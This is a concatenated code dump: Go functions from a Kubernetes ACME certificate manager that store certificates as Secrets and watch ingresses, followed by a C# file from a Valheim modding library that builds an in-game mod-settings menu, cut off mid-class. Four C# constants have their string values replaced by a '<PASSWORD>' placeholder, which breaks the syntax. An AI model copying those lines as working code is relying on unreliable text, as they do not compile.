func ingressReference(ing v1beta1.Ingress, path string) v1.ObjectReference {
return v1.ObjectReference{
Kind: "Ingress",
Namespace: ing.Namespace,
Name: ing.Name,
UID: ing.UID,
ResourceVersion: ing.ResourceVersion,
FieldPath: path,
}
}
func (k K8sClient) createEvent(ev v1.Event) {
now := unversioned.Now()
ev.Name = fmt.Sprintf("%s.%x", ev.InvolvedObject.Name, now.UnixNano())
if ev.Kind == "" {
ev.Kind = "Event"
}
if ev.APIVersion == "" {
ev.APIVersion = "v1"
}
if ev.FirstTimestamp.IsZero() {
ev.FirstTimestamp = now
}
if ev.LastTimestamp.IsZero() {
ev.LastTimestamp = now
}
if ev.Count == 0 {
ev.Count = 1
}
_, err := k.c.Core().Events(ev.Namespace).Create(&ev)
if err != nil {
log.Printf("Error posting event: %v\n", err)
return
}
}
type ACMEUserData struct {
Email string `json:"email"`
Registration *acme.RegistrationResource `json:"registration"`
Key []byte `json:"key"`
}
type ACMECertDetails struct {
Domain string `json:"domain"`
CertURL string `json:"certUrl"`
CertStableURL string `json:"certStableUrl"`
AccountRef string `json:"accountRef,omitempty"`
}
func (u *ACMEUserData) GetEmail() string {
return u.Email
}
func (u *ACMEUserData) GetRegistration() *acme.RegistrationResource {
return u.Registration
}
func (u *ACMEUserData) GetPrivateKey() crypto.PrivateKey {
pemBlock, _ := pem.Decode(u.Key)
if pemBlock.Type != "RSA PRIVATE KEY" {
log.Printf("Invalid PEM user key: Expected RSA PRIVATE KEY, got %v", pemBlock.Type)
}
privateKey, err := x509.ParsePKCS1PrivateKey(pemBlock.Bytes)
if err != nil {
log.Printf("Error while parsing private key: %v", err)
}
return privateKey
}
// ToSecret creates a Kubernetes Secret from an ACME Certificate
func (c *ACMECertData) ToSecret(tagPrefix, class string) *v1.Secret {
var metadata v1.ObjectMeta
// The "true" annotation is deprecated when a class label is used
if class != "" {
metadata.Labels = map[string]string{
addTagPrefix(tagPrefix, "domain"): c.DomainName,
addTagPrefix(tagPrefix, "class"): class,
}
} else {
metadata.Labels = map[string]string{
addTagPrefix(tagPrefix, "domain"): c.DomainName,
}
metadata.Annotations = map[string]string{
addTagPrefix(tagPrefix, "enabled"): "true",
}
}
data := make(map[string][]byte)
data["tls.crt"] = c.Cert
data["tls.key"] = c.PrivateKey
data["tls.pem"] = append(c.PrivateKey, c.Cert...)
return &v1.Secret{
TypeMeta: unversioned.TypeMeta{
APIVersion: "v1",
Kind: "Secret",
},
Data: data,
ObjectMeta: metadata,
Type: "kubernetes.io/tls",
}
}
func NewACMECertDataFromSecret(s *v1.Secret, tagPrefix string) (ACMECertData, error) {
var acmeCertData ACMECertData
var ok bool
acmeCertData.DomainName = getDomainFromLabel(s, tagPrefix)
acmeCertData.Cert, ok = s.Data["tls.crt"]
if !ok {
return acmeCertData, errors.Errorf("Could not find key tls.crt in secret %v", s.Name)
}
acmeCertData.PrivateKey, ok = s.Data["tls.key"]
if !ok {
return acmeCertData, errors.Errorf("Could not find key tls.key in secret %v", s.Name)
}
return acmeCertData, nil
}
func NewACMECertDetailsFromResource(certRes acme.CertificateResource) ACMECertDetails {
return ACMECertDetails{
Domain: certRes.Domain,
CertURL: certRes.CertURL,
CertStableURL: certRes.CertStableURL,
AccountRef: certRes.AccountRef,
}
}
func (certDetails *ACMECertDetails) ToCertResource() acme.CertificateResource {
return acme.CertificateResource{
Domain: certDetails.Domain,
CertURL: certDetails.CertURL,
CertStableURL: certDetails.CertStableURL,
AccountRef: certDetails.AccountRef,
}
}
func (k K8sClient) getSecret(namespace string, key string) (*v1.Secret, error) {
secret, err := k.c.Core().Secrets(namespace).Get(key)
if err != nil {
switch kerr := err.(type) {
case kerrors.APIStatus:
if kerr.Status().Code == http.StatusNotFound {
return nil, nil
} else {
return nil, errors.Wrapf(err, "Unexpected status code whle fetching secret %q: %v", key, kerr.Status())
}
}
return nil, errors.Wrapf(err, "Unexpected error while fetching secret %q", key)
}
return secret, nil
}
func (k K8sClient) saveSecret(namespace string, secret *v1.Secret, isUpdate bool) error {
if secret.Name == "" {
return errors.New("Secret name must be specified in metadata")
}
if isUpdate {
_, err := k.c.Secrets(namespace).Update(secret)
return err
} else {
_, err := k.c.Secrets(namespace).Create(secret)
return err
}
}
func (k K8sClient) deleteSecret(namespace string, key string) error {
return k.c.Secrets(namespace).Delete(key, nil)
}
func (k K8sClient) getSecrets(namespace string, labelSelector labels.Selector) ([]v1.Secret, error) {
listOpts := v1.ListOptions{}
if labelSelector != nil {
listOpts.LabelSelector = labelSelector.String()
}
list, err := k.c.Secrets(namespace).List(listOpts)
if err != nil {
return nil, err
}
return list.Items, nil
}
func (k K8sClient) getCertificates(namespace string, labelSelector labels.Selector) ([]Certificate, error) {
rl := flowcontrol.NewTokenBucketRateLimiter(0.2, 3)
for {
rl.Accept()
req := k.certClient.Get().Resource("certificates").Namespace(namespace)
if labelSelector != nil {
req = req.LabelsSelectorParam(labelSelector)
}
var certList CertificateList
err := req.Do().Into(&certList)
if err != nil {
log.Printf("Error while retrieving certificate: %v. Retrying", err)
} else {
return certList.Items, nil
}
}
}
func (k K8sClient) getIngresses(namespace string, labelSelector labels.Selector) ([]v1beta1.Ingress, error) {
rl := flowcontrol.NewTokenBucketRateLimiter(0.2, 3)
for {
rl.Accept()
listOpts := v1.ListOptions{}
if labelSelector != nil {
listOpts.LabelSelector = labelSelector.String()
}
ingresses, err := k.c.Extensions().Ingresses(namespace).List(listOpts)
if err != nil {
log.Printf("Error while retrieving ingress: %v. Retrying", err)
} else {
return ingresses.Items, nil
}
}
}
// Copied from cache.NewListWatchFromClient since that constructor doesn't
// allow labelselectors, but labelselectors should be preferred over field
// selectors.
func newListWatchFromClient(c cache.Getter, resource string, namespace string, selector labels.Selector) *cache.ListWatch {
listFunc := func(options api.ListOptions) (runtime.Object, error) {
return c.Get().
Namespace(namespace).
Resource(resource).
VersionedParams(&options, api.ParameterCodec).
LabelsSelectorParam(selector).
Do().
Get()
}
watchFunc := func(options api.ListOptions) (watch.Interface, error) {
return c.Get().
Prefix("watch").
Namespace(namespace).
Resource(resource).
VersionedParams(&options, api.ParameterCodec).
LabelsSelectorParam(selector).
Watch()
}
return &cache.ListWatch{ListFunc: listFunc, WatchFunc: watchFunc}
}
func (k K8sClient) monitorCertificateEvents(namespace string, selector labels.Selector, done <-chan struct{}) <-chan CertificateEvent {
events := make(chan CertificateEvent)
evFunc := func(evType watch.EventType, obj interface{}) {
cert, ok := obj.(*Certificate)
if !ok {
log.Printf("could not convert %v (%T) into Certificate", obj, obj)
return
}
events <- CertificateEvent{
Type: string(evType),
Object: *cert,
}
}
source := newListWatchFromClient(k.certClient, "certificates", namespace, selector)
store, ctrl := cache.NewInformer(source, &Certificate{}, 0, cache.ResourceEventHandlerFuncs{
AddFunc: func(obj interface{}) {
evFunc(watch.Added, obj)
},
UpdateFunc: func(old, new interface{}) {
evFunc(watch.Modified, new)
},
DeleteFunc: func(obj interface{}) {
evFunc(watch.Deleted, obj)
},
})
go func() {
for _, initObj := range store.List() {
evFunc(watch.Added, initObj)
}
go ctrl.Run(done)
}()
return events
}
func (k K8sClient) monitorIngressEvents(namespace string, selector labels.Selector, done <-chan struct{}) <-chan IngressEvent {
events := make(chan IngressEvent)
evFunc := func(evType watch.EventType, obj interface{}) {
ing, ok := obj.(*v1beta1.Ingress)
if !ok {
log.Printf("could not convert %v (%T) into Ingress", obj, obj)
return
}
events <- IngressEvent{
Type: string(evType),
Object: *ing,
}
}
source := newListWatchFromClient(k.c.Extensions().RESTClient(), "ingresses", namespace, selector)
store, ctrl := cache.NewInformer(source, &v1beta1.Ingress{}, 0, cache.ResourceEventHandlerFuncs{
AddFunc: func(obj interface{}) {
evFunc(watch.Added, obj)
},
UpdateFunc: func(old, new interface{}) {
evFunc(watch.Modified, new)
},
DeleteFunc: func(obj interface{}) {
evFunc(watch.Deleted, obj)
},
})
go func() {
for _, initObj := range store.List() {
evFunc(watch.Added, initObj)
}
go ctrl.Run(done)
}()
return events
}
func namespacedEndpoint(endpoint, namespace string) string {
return fmt.Sprintf(endpoint, namespace)
}
func namespacedAllCertEndpoint(endpoint, certNamespace string) string {
return fmt.Sprintf(endpoint, certNamespace)
}
func namespacedCertEndpoint(endpoint, certNamespace, namespace string) string {
return fmt.Sprintf(endpoint, certNamespace, namespace)
}
func addURLArgument(urlString string, key string, value string) (string, error) {
u, err := url.Parse(urlString)
if err != nil {
return "", errors.Wrapf(err, "Error parsing URL: %v", err)
}
q := u.Query()
q.Set(key, value)
u.RawQuery = q.Encode()
return u.String(), nil
}
func getDomainFromLabel(s *v1.Secret, tagPrefix string) string {
domain := s.Labels[addTagPrefix(tagPrefix, "domain")]
if domain == "" {
// deprecated plain "domain" label
// check for it in case people have the plain label in secrets when upgrading
// will be updated to the prefixed label when the Secret is next updated
domain = s.Labels["domain"]
}
return domain
}
| jbclabs/kube-cert-manager |
<|start_filename|>JotunnLib/GUI/InGameConfig.cs<|end_filename|>
// JotunnLib
// a Valheim mod
//
// File: InGameConfig.cs
// Project: JotunnLib
using System;
using System.Collections;
using System.Collections.Generic;
using System.Globalization;
using System.Linq;
using BepInEx;
using BepInEx.Configuration;
using Jotunn.Managers;
using Jotunn.Utils;
using UnityEngine;
using UnityEngine.Events;
using UnityEngine.UI;
using Object = UnityEngine.Object;
namespace Jotunn.GUI
{
/// <summary>
/// An ingame GUI for BepInEx config files
/// </summary>
internal static class InGameConfig
{
/// <summary>
/// Name of the menu entry
/// </summary>
private const string MenuToken = <PASSWORD>";
/// <summary>
/// Text of the Cancel button
/// </summary>
private const string CancelToken = <PASSWORD>";
/// <summary>
/// Text of the OK button
/// </summary>
private const string OKToken = <PASSWORD>";
/// <summary>
/// Text of the keybind dialogue
/// </summary>
private const string KeybindToken = <PASSWORD>";
/// <summary>
/// Mod settings Prefab
/// </summary>
private static GameObject SettingsPrefab;
/// <summary>
/// Current mod settings instance
/// </summary>
private static GameObject SettingsRoot;
/// <summary>
/// Load and init hooks on client instances
/// </summary>
[PatchInit(0)]
public static void Init()
{
// Dont init on a headless server
if (GUIManager.IsHeadless())
{
return;
}
LoadDefaultLocalization();
GUIManager.OnCustomGUIAvailable += LoadModSettingsPrefab;
On.FejdStartup.SetupGui += FejdStartup_SetupGui;
On.Menu.Start += Menu_Start;
}
/// <summary>
/// Register Jötunn's default localization
/// </summary>
private static void LoadDefaultLocalization()
{
LocalizationManager.Instance.JotunnLocalization.AddTranslation(MenuToken, "Mod Settings");
LocalizationManager.Instance.JotunnLocalization.AddTranslation(CancelToken, "Cancel");
LocalizationManager.Instance.JotunnLocalization.AddTranslation(OKToken, "OK");
LocalizationManager.Instance.JotunnLocalization.AddTranslation(KeybindToken, "Press a key");
}
/// <summary>
/// Load the mod settings prefab and apply Valheim style to it
/// </summary>
private static void LoadModSettingsPrefab()
{
AssetBundle bundle = AssetUtils.LoadAssetBundleFromResources("modsettings", typeof(Main).Assembly);
SettingsPrefab = bundle.LoadAsset<GameObject>("ModSettings");
PrefabManager.Instance.AddPrefab(SettingsPrefab, Main.Instance.Info.Metadata);
bundle.Unload(false);
SettingsPrefab.AddComponent<CloseBehaviour>();
var settings = SettingsPrefab.GetComponent<ModSettings>();
settings.Panel.sprite = GUIManager.Instance.GetSprite("woodpanel_settings");
settings.Panel.type = Image.Type.Sliced;
settings.Panel.material = PrefabManager.Cache.GetPrefab<Material>("litpanel");
GUIManager.Instance.ApplyTextStyle(settings.Header, GUIManager.Instance.AveriaSerifBold, GUIManager.Instance.ValheimOrange, 32);
settings.Header.text = LocalizationManager.Instance.TryTranslate(MenuToken);
GUIManager.Instance.ApplyButtonStyle(settings.CurrentPluginButton);
var currentPluginButtonImage = settings.CurrentPluginButton.GetComponent<Image>();
currentPluginButtonImage.sprite = GUIManager.Instance.GetSprite("crafting_panel_bkg");
currentPluginButtonImage.type = Image.Type.Sliced;
currentPluginButtonImage.material = new Material(PrefabManager.Cache.GetPrefab<Material>("litpanel"));
currentPluginButtonImage.material.SetFloat("_Brightness", 1f);
settings.CurrentPluginButton.GetComponentInChildren<Text>(true).fontSize = 20;
GUIManager.Instance.ApplyScrollRectStyle(settings.ScrollRect);
settings.ScrollRect.GetComponent<Image>().sprite = GUIManager.Instance.GetSprite("panel_interior_bkg_128");
GUIManager.Instance.ApplyButtonStyle(settings.CancelButton, 20);
settings.CancelButton.GetComponentInChildren<Text>().text = LocalizationManager.Instance.TryTranslate(CancelToken);
GUIManager.Instance.ApplyButtonStyle(settings.OKButton, 20);
settings.OKButton.GetComponentInChildren<Text>().text = LocalizationManager.Instance.TryTranslate(OKToken);
var keybindPanel = settings.BindDialog.GetComponentInChildren<Image>(true);
keybindPanel.sprite = GUIManager.Instance.GetSprite("woodpanel_password");
keybindPanel.type = Image.Type.Sliced;
keybindPanel.material = PrefabManager.Cache.GetPrefab<Material>("litpanel");
var keybindText = settings.BindDialog.GetComponentInChildren<Text>(true);
GUIManager.Instance.ApplyTextStyle(keybindText, GUIManager.Instance.AveriaSerifBold, GUIManager.Instance.ValheimOrange, 20);
keybindText.text = LocalizationManager.Instance.TryTranslate(KeybindToken);
var plugin = settings.PluginPrefab.GetComponent<ModSettingPlugin>();
GUIManager.Instance.ApplyButtonStyle(plugin.Button);
var pluginButtonImage = plugin.Button.GetComponent<Image>();
pluginButtonImage.sprite = GUIManager.Instance.GetSprite("crafting_panel_bkg");
pluginButtonImage.type = Image.Type.Sliced;
pluginButtonImage.material = new Material(PrefabManager.Cache.GetPrefab<Material>("litpanel"));
pluginButtonImage.material.SetFloat("_Brightness", 1f);
plugin.Text.fontSize = 20;
var section = settings.SectionPrefab.GetComponent<Text>();
section.font = GUIManager.Instance.AveriaSerifBold;
var config = settings.ConfigPrefab.GetComponent<ModSettingConfig>();
config.Header.font = GUIManager.Instance.AveriaSerifBold;
config.Description.font = GUIManager.Instance.AveriaSerifBold;
GUIManager.Instance.ApplyButtonStyle(config.Button, 14);
config.Button.GetComponent<Image>().sprite = GUIManager.Instance.GetSprite("text_field");
config.Button.GetComponentInChildren<Text>(true).color = Color.white;
GUIManager.Instance.ApplyInputFieldStyle(config.InputField, 14);
GUIManager.Instance.ApplyToogleStyle(config.Toggle);
GUIManager.Instance.ApplyDropdownStyle(config.Dropdown, 14);
config.Dropdown.ClearOptions();
GUIManager.Instance.ApplySliderStyle(config.Slider, new Vector2(15f, -10f));
GUIManager.Instance.ApplyInputFieldStyle(config.ColorInput, 14);
GUIManager.Instance.ApplyButtonStyle(config.ColorButton);
var vector2 = config.Vector2InputX.transform.parent.gameObject;
foreach (var txt in vector2.GetComponentsInChildren<Text>(true))
{
GUIManager.Instance.ApplyTextStyle(txt, 14);
}
foreach (var inp in vector2.GetComponentsInChildren<InputField>(true))
{
GUIManager.Instance.ApplyInputFieldStyle(inp, 14);
}
GUIManager.OnCustomGUIAvailable -= LoadModSettingsPrefab;
}
/// <summary>
/// Adding a MonoBehaviour to close the mod settings here.
/// The Unity project does not know about BepInEx...
/// </summary>
private class CloseBehaviour : MonoBehaviour
{
private void Awake()
{
var settings = GetComponent<ModSettings>();
settings.CancelButton.onClick.AddListener(() =>
{
try { ColorPicker.Cancel(); } catch (Exception) { }
ZInput.instance.Load();
HideWindow();
});
settings.OKButton.onClick.AddListener(() =>
{
try { ColorPicker.Done(); } catch (Exception) { }
ZInput.instance.Save();
SaveConfiguration();
HideWindow();
});
}
private void Update()
{
if (Input.GetKeyDown(KeyCode.Escape))
{
GetComponent<ModSettings>().CancelButton.onClick.Invoke();
}
}
}
/// <summary>
/// Add default localization and instantiate the mod settings button in Fejd.
/// </summary>
private static void FejdStartup_SetupGui(On.FejdStartup.orig_SetupGui orig, FejdStartup self)
{
orig(self);
try
{
var menuList = self.m_mainMenu.transform.Find("MenuList");
CreateMenu(menuList);
self.StartCoroutine(CreateWindow(menuList));
}
catch (Exception ex)
{
SettingsRoot = null;
Logger.LogWarning($"Exception caught while creating the Mod Settings: {ex}");
}
}
/// <summary>
/// Cache current configuration values for possible sync and instantiate
/// the mod settings button on first in-game menu start.
/// </summary>
private static void Menu_Start(On.Menu.orig_Start orig, Menu self)
{
orig(self);
try
{
SynchronizationManager.Instance.CacheConfigurationValues();
CreateMenu(self.m_menuDialog);
self.StartCoroutine(CreateWindow(self.m_menuDialog));
}
catch (Exception ex)
{
SettingsRoot = null;
Logger.LogWarning($"Exception caught while creating the Mod Settings: {ex}");
}
}
/// <summary>
/// Create our own menu list entry when mod config is available
/// </summary>
/// <param name="menuList"></param>
private static void CreateMenu(Transform menuList)
{
var anyConfig = BepInExUtils.GetDependentPlugins(true).Any(x => GetConfigurationEntries(x.Value).Any());
if (!anyConfig)
{
return;
}
Logger.LogDebug("Instantiating Mod Settings");
var settingsFound = false;
var mainMenuButtons = new List<Button>();
for (int i = 0; i < menuList.childCount; i++)
{
if (menuList.GetChild(i).gameObject.activeInHierarchy &&
menuList.GetChild(i).name != "ModSettings" &&
menuList.GetChild(i).TryGetComponent<Button>(out var menuButton))
{
mainMenuButtons.Add(menuButton);
}
if (menuList.GetChild(i).name == "Settings")
{
Transform modSettings = Object.Instantiate(menuList.GetChild(i), menuList);
modSettings.name = "ModSettings";
modSettings.GetComponentInChildren<Text>().text = LocalizationManager.Instance.TryTranslate(MenuToken);
Button modSettingsButton = modSettings.GetComponent<Button>();
for (int j = 0; j < modSettingsButton.onClick.GetPersistentEventCount(); ++j)
{
modSettingsButton.onClick.SetPersistentListenerState(j, UnityEventCallState.Off);
}
modSettingsButton.onClick.RemoveAllListeners();
modSettingsButton.onClick.AddListener(() =>
{
try
{
ShowWindow();
}
catch (Exception ex)
{
SettingsRoot = null;
Logger.LogWarning($"Exception caught while showing the Mod Settings window: {ex}");
}
});
mainMenuButtons.Add(modSettingsButton);
Transform left = modSettings.Find("LeftKnot");
if (left != null)
{
left.localPosition = new Vector2(left.localPosition.x - 10f, left.localPosition.y);
}
Transform right = modSettings.Find("RightKnot");
if (right != null)
{
right.localPosition = new Vector2(right.localPosition.x + 10f, right.localPosition.y);
}
settingsFound = true;
}
else if (settingsFound)
{
RectTransform rectTransform = menuList.GetChild(i).GetComponent<RectTransform>();
rectTransform.anchoredPosition = new Vector2(rectTransform.anchoredPosition.x,
rectTransform.anchoredPosition.y - 40);
}
}
if (FejdStartup.instance != null)
{
FejdStartup.instance.m_menuButtons = mainMenuButtons.ToArray();
}
}
/// <summary>
/// Create custom configuration window
/// </summary>
private static IEnumerator CreateWindow(Transform menuList)
{
// Create settings window
SettingsRoot = Object.Instantiate(SettingsPrefab, menuList.parent);
SettingsRoot.SetActive(false);
var settings = SettingsRoot.GetComponent<ModSettings>();
// Iterate over all dependent plugins (including Jotunn itself)
foreach (var mod in BepInExUtils.GetDependentPlugins(true)
.OrderBy(x => x.Value.Info.Metadata.Name))
{
if (!GetConfigurationEntries(mod.Value).Any(x => x.Value.IsVisible()))
{
continue;
}
try
{
CreatePlugin(settings, mod);
}
catch (Exception ex)
{
Logger.LogWarning($"Exception caught while creating mod settings for {mod.Key}: {ex}");
}
yield return null;
}
}
/// <summary>
/// Create settings for a plugin
/// </summary>
private static void CreatePlugin(ModSettings settings, KeyValuePair<string, BaseUnityPlugin> mod)
{
settings.AddPlugin(mod.Key, $"{mod.Value.Info.Metadata.Name} {mod.Value.Info.Metadata.Version}");
foreach (var kv in GetConfigurationEntries(mod.Value)
.Where(x => x.Value.IsVisible())
.GroupBy(x => x.Key.Section))
{
settings.AddSection(mod.Key, kv.Key);
foreach (var entry in kv.OrderBy(x =>
{
if (x.Value.Description.Tags.FirstOrDefault(y => y is ConfigurationManagerAttributes) is
ConfigurationManagerAttributes cma)
{
return cma.Order ?? int.MaxValue;
}
return int.MaxValue;
}).ThenBy(x => x.Key.Key))
{
// Skip actual GamepadConfigs, those are combined with ButtonConfig entries
if (entry.Value.SettingType == typeof(InputManager.GamepadButton))
{
continue;
}
// Get Attributes or instantiate default
var entryAttributes =
entry.Value.Description.Tags.FirstOrDefault(x => x is ConfigurationManagerAttributes) as
ConfigurationManagerAttributes ?? new ConfigurationManagerAttributes();
// Build description
var description = entry.Value.Description.Description;
var buttonName = entry.Value.GetBoundButtonName();
if (!string.IsNullOrEmpty(buttonName))
{
description += $"{Environment.NewLine}This key is bound to button '{buttonName.Split('!')[0]}'.";
}
if (entry.Value.Description.AcceptableValues != null)
{
description += Environment.NewLine + "(" +
entry.Value.Description.AcceptableValues.ToDescriptionString()
.TrimStart('#')
.Trim() + ")";
}
if (entryAttributes.IsAdminOnly)
{
description += $"{Environment.NewLine}(Server side setting)";
}
// Add new Config GO and add config bound component by type
if (entry.Value.SettingType == typeof(bool))
{
var go = settings.AddConfig(mod.Key, $"{entry.Key.Key}:", entryAttributes.EntryColor,
description, entryAttributes.DescriptionColor);
var conf = go.AddComponent<ConfigBoundBoolean>();
conf.SetData(mod.Value.Info.Metadata.GUID, entry.Value);
}
else if (entry.Value.SettingType == typeof(int))
{
var go = settings.AddConfig(mod.Key, $"{entry.Key.Key}:", entryAttributes.EntryColor,
description, entryAttributes.DescriptionColor);
var conf = go.AddComponent<ConfigBoundInt>();
conf.SetData(mod.Value.Info.Metadata.GUID, entry.Value);
}
else if (entry.Value.SettingType == typeof(float))
{
var go = settings.AddConfig(mod.Key, $"{entry.Key.Key}:", entryAttributes.EntryColor,
description, entryAttributes.DescriptionColor);
var conf = go.AddComponent<ConfigBoundFloat>();
conf.SetData(mod.Value.Info.Metadata.GUID, entry.Value);
}
else if (entry.Value.SettingType == typeof(double))
{
var go = settings.AddConfig(mod.Key, $"{entry.Key.Key}:", entryAttributes.EntryColor,
description, entryAttributes.DescriptionColor);
var conf = go.AddComponent<ConfigBoundDouble>();
conf.SetData(mod.Value.Info.Metadata.GUID, entry.Value);
}
else if (entry.Value.SettingType == typeof(string))
{
var go = settings.AddConfig(mod.Key, $"{entry.Key.Key}:", entryAttributes.EntryColor,
description, entryAttributes.DescriptionColor);
var conf = go.AddComponent<ConfigBoundString>();
conf.SetData(mod.Value.Info.Metadata.GUID, entry.Value);
}
else if (entry.Value.SettingType == typeof(KeyCode))
{
var go = settings.AddConfig(mod.Key, $"{entry.Key.Key}:", entryAttributes.EntryColor,
description, entryAttributes.DescriptionColor);
var conf = go.AddComponent<ConfigBoundKeyCode>();
conf.SetData(mod.Value.Info.Metadata.GUID, entry.Value);
if (entry.Value.GetButtonConfig()?.GamepadConfig != null)
{
var conf2 = go.AddComponent<ConfigBoundGamepadButton>();
conf2.SetData(mod.Value.Info.Metadata.GUID,
entry.Value.GetButtonConfig().GamepadConfig);
}
}
else if (entry.Value.SettingType == typeof(KeyboardShortcut))
{
var go = settings.AddConfig(mod.Key, $"{entry.Key.Key}:", entryAttributes.EntryColor,
description, entryAttributes.DescriptionColor);
var conf = go.AddComponent<ConfigBoundKeyboardShortcut>();
conf.SetData(mod.Value.Info.Metadata.GUID, entry.Value);
}
else if (entry.Value.SettingType == typeof(Color))
{
var go = settings.AddConfig(mod.Key, $"{entry.Key.Key}:", entryAttributes.EntryColor,
description, entryAttributes.DescriptionColor);
var conf = go.AddComponent<ConfigBoundColor>();
conf.SetData(mod.Value.Info.Metadata.GUID, entry.Value);
}
else if (entry.Value.SettingType == typeof(Vector2))
{
var go = settings.AddConfig(mod.Key, $"{entry.Key.Key}:", entryAttributes.EntryColor,
description, entryAttributes.DescriptionColor);
var conf = go.AddComponent<ConfigBoundVector2>();
conf.SetData(mod.Value.Info.Metadata.GUID, entry.Value);
}
else if (entry.Value.SettingType.IsEnum)
{
var go = settings.AddConfig(mod.Key, $"{entry.Key.Key}:", entryAttributes.EntryColor,
description, entryAttributes.DescriptionColor);
var conf = go.AddComponent<ConfigBoundEnum>();
conf.SetData(mod.Value.Info.Metadata.GUID, entry.Value);
}
}
}
}
/// <summary>
/// Get all config entries of a module by GUID
/// </summary>
/// <param name="guid"></param>
/// <returns></returns>
private static IEnumerable<KeyValuePair<ConfigDefinition, ConfigEntryBase>> GetConfigurationEntries(string guid)
{
return GetConfigurationEntries(
BepInExUtils.GetDependentPlugins(true)
.FirstOrDefault(x => x.Key == guid).Value);
}
/// <summary>
/// Get all config entries of a module
/// </summary>
/// <param name="module"></param>
/// <returns></returns>
private static IEnumerable<KeyValuePair<ConfigDefinition, ConfigEntryBase>> GetConfigurationEntries(BaseUnityPlugin module)
{
using var enumerator = module.Config.GetEnumerator();
while (enumerator.MoveNext())
{
yield return enumerator.Current;
}
}
/// <summary>
/// Refresh the displayed values
/// </summary>
private static void ShowWindow()
{
var settings = SettingsRoot.GetComponent<ModSettings>();
if (Menu.instance)
{
Menu.instance.m_settingsInstance = SettingsRoot;
}
foreach (var plugin in settings.Plugins)
{
plugin.Value.gameObject.SetActive(
GetConfigurationEntries(plugin.Key)
.Any(x => x.Value.IsVisible() && x.Value.IsWritable()));
}
foreach (var section in settings.Sections)
{
section.gameObject.SetActive(
GetConfigurationEntries(section.GUID)
.Any(x => x.Key.Section == section.name && x.Value.IsVisible() && x.Value.IsWritable()));
}
foreach (var comp in settings.Configs
.SelectMany(config => config.GetComponents<MonoBehaviour>()
.Where(x => x.GetType().HasImplementedRawGeneric(typeof(ConfigBound<>)))))
{
var config = (IConfigBound)comp;
config.Read();
comp.gameObject.SetActive(config.Entry.IsWritable());
}
// Actually show the window
SettingsRoot.SetActive(true);
}
private static void HideWindow()
{
var settings = SettingsRoot.GetComponent<ModSettings>();
if (Menu.instance)
{
Menu.instance.m_settingsInstance = null;
}
foreach (var plugin in settings.Plugins.Values)
{
plugin.Content.gameObject.SetActive(false);
}
settings.CurrentPluginButton.gameObject.SetActive(false);
settings.ScrollRect.normalizedPosition = new Vector2(0f, 1f);
SettingsRoot.SetActive(false);
}
/// <summary>
/// Write all displayed values back to the config files
/// </summary>
private static void SaveConfiguration()
{
var settings = SettingsRoot.GetComponent<ModSettings>();
// Iterate over all configs
foreach (var comp in settings.Configs
.SelectMany(config => config.GetComponents<MonoBehaviour>()
.Where(x => x.GetType().HasImplementedRawGeneric(typeof(ConfigBound<>)))))
{
((IConfigBound)comp).Write();
}
// Sync changed config
SynchronizationManager.Instance.SynchronizeChangedConfig();
}
/// <summary>
/// Interface for the generic config bind class used in <see cref="SaveConfiguration"/>
/// </summary>
internal interface IConfigBound
{
public ConfigEntryBase Entry { get; set; }
public void Read();
public void Write();
}
/// <summary>
/// Generic abstract version of the config binding class
/// </summary>
/// <typeparam name="T"></typeparam>
internal abstract class ConfigBound<T> : MonoBehaviour, IConfigBound
{
public ModSettingConfig Config { get; set; }
public string ModGUID { get; set; }
public ConfigEntryBase Entry { get; set; }
public AcceptableValueBase Clamp { get; set; }
public ConfigurationManagerAttributes Attributes { get; set; }
public T Default { get; set; }
public T Value
{
get => GetValue();
set => SetValue(value);
}
public abstract T GetValue();
public abstract void SetValue(T value);
public void Read()
{
Value = (T)Entry.BoxedValue;
}
public void Write()
{
Entry.BoxedValue = Value;
}
public void SetData(string modGuid, ConfigEntryBase entry)
{
Config = gameObject.GetComponent<ModSettingConfig>();
ModGUID = modGuid;
Entry = entry;
Register();
Value = (T)Entry.BoxedValue;
Clamp = Entry.Description.AcceptableValues;
Attributes =
Entry.Description.Tags.FirstOrDefault(x =>
x is ConfigurationManagerAttributes) as ConfigurationManagerAttributes;
if (Attributes != null)
{
SetReadOnly(Attributes.ReadOnly == true);
if (Attributes.IsAdminOnly && !Attributes.IsUnlocked)
{
SetEnabled(false);
}
else
{
SetEnabled(true);
}
Default = (T)Entry.DefaultValue;
}
}
public abstract void Register();
public abstract void SetEnabled(bool enabled);
public abstract void SetReadOnly(bool readOnly);
public void Reset()
{
SetValue(Default);
}
// Wrap AcceptableValueBase's IsValid
public bool IsValid()
{
if (Clamp != null)
{
return Clamp.IsValid(Value);
}
return true;
}
}
/// <summary>
/// Boolean Binding
/// </summary>
internal class ConfigBoundBoolean : ConfigBound<bool>
{
public override void Register()
{
Config.Toggle.gameObject.SetActive(true);
}
public override bool GetValue()
{
return Config.Toggle.isOn;
}
public override void SetValue(bool value)
{
Config.Toggle.isOn = value;
}
public override void SetEnabled(bool enabled)
{
Config.Toggle.enabled = enabled;
}
public override void SetReadOnly(bool readOnly)
{
Config.Toggle.enabled = !readOnly;
}
}
/// <summary>
/// Integer binding
/// </summary>
internal class ConfigBoundInt : ConfigBound<int>
{
public override void Register()
{
Config.InputField.gameObject.SetActive(true);
Config.InputField.characterValidation = InputField.CharacterValidation.Integer;
if (Entry.Description.AcceptableValues is AcceptableValueRange<int> acceptableValueRange)
{
Config.Slider.gameObject.SetActive(true);
Config.Slider.minValue = acceptableValueRange.MinValue;
Config.Slider.maxValue = acceptableValueRange.MaxValue;
Config.Slider.onValueChanged.AddListener(value =>
Config.InputField.SetTextWithoutNotify(((int)value)
.ToString(CultureInfo.CurrentCulture)));
Config.InputField.onValueChanged.AddListener(text =>
{
if (int.TryParse(text, out var value))
{
Config.Slider.SetValueWithoutNotify(value);
}
});
}
Config.InputField.onValueChanged.AddListener(x =>
{
Config.InputField.textComponent.color = IsValid() ? Color.white : Color.red;
});
}
public override int GetValue()
{
if (!int.TryParse(Config.InputField.text, out var temp))
{
temp = Default;
}
return temp;
}
public override void SetValue(int value)
{
Config.InputField.text = value.ToString();
}
public override void SetEnabled(bool enabled)
{
Config.InputField.enabled = enabled;
}
public override void SetReadOnly(bool readOnly)
{
Config.InputField.readOnly = readOnly;
Config.InputField.textComponent.color = readOnly ? Color.grey : Color.white;
}
}
/// <summary>
/// Float binding
/// </summary>
internal class ConfigBoundFloat : ConfigBound<float>
{
public override void Register()
{
Config.InputField.gameObject.SetActive(true);
Config.InputField.characterValidation = InputField.CharacterValidation.Decimal;
if (Entry.Description.AcceptableValues is AcceptableValueRange<float> acceptableValueRange)
{
